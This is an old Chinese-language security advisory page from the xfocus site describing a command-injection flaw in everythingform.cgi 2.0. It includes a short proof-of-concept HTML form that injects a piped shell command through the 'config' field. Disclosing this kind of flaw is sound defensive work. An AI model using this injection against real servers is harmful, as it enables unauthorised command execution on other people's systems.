xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Leif M. Wright everythingform.cgi存在任意命令可以执行漏洞


发布时间:2000-12-14
更新时间:2000-12-14
严重程度:
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Leif M. Wright everythingform.cgi 2.0
详细描述
Leif M. Wright's everything.cgi是一个表单设计工具存在一个输入效验问题,
脚本没有正确的过滤用户输入的'config'栏中的SHELL命令字符,结果导致
可以以WEB的权利执行任意命令。

测试代码
:
    <form action="http://www.conservatives.net/someplace/everythingform.cgi"
method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping
-c 5 www.foobar.com|">
<input type=hidden name=Name value="expletive deleted">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>

解决方案
尚无

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved